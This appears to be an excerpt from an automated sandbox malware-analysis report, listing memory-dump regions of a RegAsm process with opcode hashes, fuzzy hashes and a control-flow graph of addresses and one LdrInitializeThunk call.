                                                                                          • Opcode ID: 1b067c57a3b27f74eaa5568c4d606e6f99aaad8725974bbfc18f4d5e44e17006
                                                                                          • Instruction ID: d0570ca9c5010e659c372006a6c45b039da866778a4272bf10bc20c23cf7f645
                                                                                          • Opcode Fuzzy Hash: 1b067c57a3b27f74eaa5568c4d606e6f99aaad8725974bbfc18f4d5e44e17006
                                                                                          • Instruction Fuzzy Hash: 51A1F670D00608CFEB14DFA9C944B9DBBB1FF88315F248269E409AB2A1EB759D85CF54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3925313781.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_9e0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 696c9780775fefdf0f4adbccd26244ba942a1c195cda6c5700542655672f668b
                                                                                          • Instruction ID: cb46751d0044dd6ac0279606246ae26450b8fe891bef91ecd14a3e0b97d2befd
                                                                                          • Opcode Fuzzy Hash: 696c9780775fefdf0f4adbccd26244ba942a1c195cda6c5700542655672f668b
                                                                                          • Instruction Fuzzy Hash: B1910270D00618CFDB10DFA9C988B9CBBB1FF48315F208259E409AB2A1EB759D85CF54

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1650 9ec76c 1651 9ec82b-9ec83c 1650->1651 1652 9ec83e 1651->1652 1653 9ec843-9ec84c 1651->1653 1652->1653 1655 9ec852-9ec865 1653->1655 1656 9ec623-9ec648 1653->1656 1659 9ec86c-9ec887 1655->1659 1660 9ec867 1655->1660 1657 9ec64f-9ec686 1656->1657 1658 9ec64a 1656->1658 1669 9ec68d-9ec6bf 1657->1669 1670 9ec688 1657->1670 1658->1657 1661 9ec88e-9ec8a2 1659->1661 1662 9ec889 1659->1662 1660->1659 1666 9ec8a9-9ec8bf LdrInitializeThunk 1661->1666 1667 9ec8a4 1661->1667 1662->1661 1668 9ec8c1-9ec9bf 1666->1668 1667->1666 1673 9ec9c7-9ec9d1 1668->1673 1674 9ec9c1-9ec9c6 call 9e5ca8 1668->1674 1675 9ec723-9ec736 1669->1675 1676 9ec6c1-9ec6e6 1669->1676 1670->1669 1674->1673 1681 9ec73d-9ec762 1675->1681 1682 9ec738 1675->1682 1678 9ec6ed-9ec71b 1676->1678 1679 9ec6e8 1676->1679 1678->1675 1679->1678 1685 9ec764-9ec765 1681->1685 1686 9ec771-9ec7a9 1681->1686 1682->1681 1685->1655 1687 9ec7ab 1686->1687 1688 9ec7b0-9ec811 call 9ec168 1686->1688 1687->1688 1694 9ec818-9ec82a 1688->1694 1695 9ec813 1688->1695 1694->1651 1695->1694
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL(00000000), ref: 009EC8AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3925313781.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_9e0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 664c4b2eab8a1e54373d5db80875f05ee7daa9d43cd3400c047b839ff1edd877
                                                                                          • Instruction ID: 7ca3a27a877fb53b509d5f53fd3a00767be150878a81b964a9ac366265839271
                                                                                          • Opcode Fuzzy Hash: 664c4b2eab8a1e54373d5db80875f05ee7daa9d43cd3400c047b839ff1edd877
                                                                                          • Instruction Fuzzy Hash: 10116AB5E002499FDB05DBAAD984EADBBB5FF88305F648125E884E7342D734DC42CB60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3925123045.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_92d000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 125579cde04593f25206a17ee857fe584dc53a9a43dc1bf6df5dfb914577730f
                                                                                          • Instruction ID: 58d5de7cb0d08cb48ee5527f930c4648714bda89c8f835875ec607d9150a6eab
                                                                                          • Opcode Fuzzy Hash: 125579cde04593f25206a17ee857fe584dc53a9a43dc1bf6df5dfb914577730f
                                                                                          • Instruction Fuzzy Hash: FE318B7554E3C48FCB038B24D990701BF71AB46214F29C5DBC8888F2A7C23A980ACB62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3925123045.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_92d000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5ef0040186c78699f18685a90eb99611a78c04f098310dfb1f6d68d7183e826a
                                                                                          • Instruction ID: 4c8ba77128b05a6eeddfd10392f05d6203ebca9b7b27d15c31269c94ce61f2ac
                                                                                          • Opcode Fuzzy Hash: 5ef0040186c78699f18685a90eb99611a78c04f098310dfb1f6d68d7183e826a
                                                                                          • Instruction Fuzzy Hash: C7213471649300DFDB14DF10E9C0B26BBA5FB84314F34CA6DD8494B26AC33AD847CA62